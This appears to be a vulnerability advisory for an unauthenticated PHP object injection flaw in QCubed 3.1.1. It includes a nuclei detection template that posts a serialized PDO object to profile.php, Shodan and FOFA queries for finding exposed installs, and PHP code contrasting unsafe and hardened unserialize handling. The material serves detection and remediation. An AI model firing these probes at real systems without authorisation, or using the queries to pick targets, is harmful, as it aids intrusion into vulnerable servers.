QCubed PHP Object Injection Vulnerability

Vulnerability Information

Vulnerability name: QCubed PHP Object Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2020-24914

Vulnerability type: Deserialization

Severity: Critical

Description: QCubed is an open-source PHP framework for rapid development of database-driven web applications. It is widely used in web development projects and provides a rich component library and powerful data-model features. Version 3.1.1 and all earlier versions of the framework contain a PHP object injection vulnerability caused by unserializing untrusted POST data in profile.php. An attacker can exploit it by sending a crafted POST request to execute arbitrary PHP code on the server, potentially leading to complete system compromise. The technical root cause is an unsafe deserialization operation: user input is passed directly to unserialize without proper validation or sanitization. Exploitation requires no authentication of any kind and can be carried out remotely, posing a serious threat to affected systems, including but not limited to data leakage, service disruption and further intrusion.

Vendor: qcubed

Product: qcubed

Affected versions: 3.1.1

Search query: http.html:"QCubed" || http.html:"qcubed"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/571628f3459047c154d698fc1e079f727a6bdec5/http%2Fcves%2F2020%2FCVE-2020-24914.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2020-24914

info:
  name: QCubed 3.1.1 - PHP Object Injection
  author: riteshs4hu
  severity: critical
  description: |
    QCubed 3.1.1 and all versions contain a PHP object injection vulnerability caused by unserializing untrusted POST data in profile.php, allowing unauthenticated attackers to execute arbitrary code via crafted POST requests.
  impact: |
    Successful exploitation allows unauthenticated attackers to execute arbitrary PHP code on the server, potentially leading to complete system compromise.
  remediation: |
    Update QCubed to the latest version that addresses this vulnerability or implement proper input validation and sanitization.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24914
    - https://seclists.org/fulldisclosure/2021/Mar/28
    - https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
    - https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-24914
    cwe-id: CWE-502
    cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: qcubed
    product: qcubed
    shodan-query: 'http.html:"QCubed" || http.html:"qcubed"'
    fofa-query: 'body="QCubed" || body="qcubed"'
  tags: cve,cve2020,qcubed,rce,deserialization

http:
  - method: POST
    path:
      - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    # strProfileData is base64 for the serialized object O:3:"PDO":0:{}.
    # PDO refuses to be unserialized, so a vulnerable endpoint that reaches
    # unserialize() reports a PDOException instead of instantiating anything.
    body: "intDatabaseIndex=1&strReferrer=test&strProfileData=TzozOiJQRE8iOjA6e30%3d"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You cannot serialize or unserialize PDO instances"
          - "PDOException"
        condition: or

      - type: status
        status:
          - 200
          - 500
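The unsafe pattern the description names (POST data passed straight to unserialize in profile.php) beside a hardened form, as an added illustration that is not QCubed's own code: the field name strProfileData comes from the template's POST body, while the function names and handler shape are assumptions.

```php
<?php
// Added illustration, not QCubed's profile.php. strProfileData is the field the
// template posts; loadProfileUnsafe/loadProfileSafe and the handler shape are assumed.

// Unsafe: the raw POST value becomes live PHP objects, so any class with a
// __wakeup()/__destruct() side effect is instantiable by an anonymous client.
function loadProfileUnsafe(array $post)
{
    return unserialize($post['strProfileData'] ?? '');
}

// Hardened: allowed_classes => false turns every serialized object into
// __PHP_Incomplete_Class (no constructor, __wakeup or __destruct of the named
// class runs), and the result must then be an array containing only scalars.
function loadProfileSafe(array $post): ?array
{
    $raw = $post['strProfileData'] ?? '';
    if (!is_string($raw) || strlen($raw) > 65536) {
        return null;
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return null;            // false on malformed input, or a bare object
    }
    $clean = true;
    array_walk_recursive($data, function ($leaf) use (&$clean) {
        if (!is_scalar($leaf) && $leaf !== null) {
            $clean = false;     // __PHP_Incomplete_Class or resource: reject
        }
    });
    return $clean ? $data : null;
}

// The template's probe decodes to O:3:"PDO":0:{}. On the unsafe path PDO's
// __wakeup throws "You cannot serialize or unserialize PDO instances" (the
// matcher string). On the safe path no object is created and the request is
// rejected, so the scanner signature disappears along with the bug.
$probe = ['strProfileData' => base64_decode('TzozOiJQRE8iOjA6e30=')];
var_dump(loadProfileSafe($probe));                                    // NULL
$ok = ['strProfileData' => serialize(['page' => 'index', 'ms' => 12])];
var_dump(loadProfileSafe($ok));                                       // array(2)
```

If the profile data is produced by the application's own client-side code, sending it as JSON and parsing it with json_decode removes unserialize from the request path entirely.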